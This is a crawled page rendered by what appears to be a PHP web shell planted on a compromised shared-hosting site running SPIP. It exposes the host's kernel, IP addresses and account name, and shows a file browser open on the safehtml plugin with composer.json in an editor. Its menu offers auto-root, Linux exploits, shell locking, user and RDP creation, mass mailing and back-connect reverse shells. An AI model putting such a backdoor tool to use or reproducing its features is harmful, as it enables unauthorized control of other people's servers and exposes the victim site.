Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
plugins-dist /
safehtml /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwx---r-x
inc
[ DIR ]
drwx---r-x
lang
[ DIR ]
drwx---r-x
lib
[ DIR ]
drwx---r-x
sanitizer
[ DIR ]
drwx---r-x
src
[ DIR ]
drwx---r-x
tests
[ DIR ]
drwx---r-x
.gitattributes
232
B
-rw----r--
.gitignore
92
B
-rw----r--
CHANGELOG.md
566
B
-rw----r--
README.md
122
B
-rw----r--
composer.json
763
B
-rw----r--
paquet.xml
667
B
-rw----r--
phpcs.xml.dist
480
B
-rw----r--
phpstan-baseline.neon
1.92
KB
-rw----r--
phpstan.neon.dist
221
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "spip/safehtml", "description": "Protection des forums contre le cross-site scripting", "license": "GPL-3.0-or-later", "type": "spip-plugin", "authors": [ { "name": "Collectif SPIP", "homepage": "https://discuter.spip.net/c/spip-dev/5", "role": "Maintainer" } ], "require": { "php": "^7.4 || ^8.0" }, "require-dev": { "dealerdirect/phpcodesniffer-composer-installer": "^0.7.1", "phpstan/phpstan": "^1.4", "spip/coding-standards": "^1.2" }, "config": { "allow-plugins": { "dealerdirect/phpcodesniffer-composer-installer": true }, "platform": { "php": "7.4.27" } } }
Close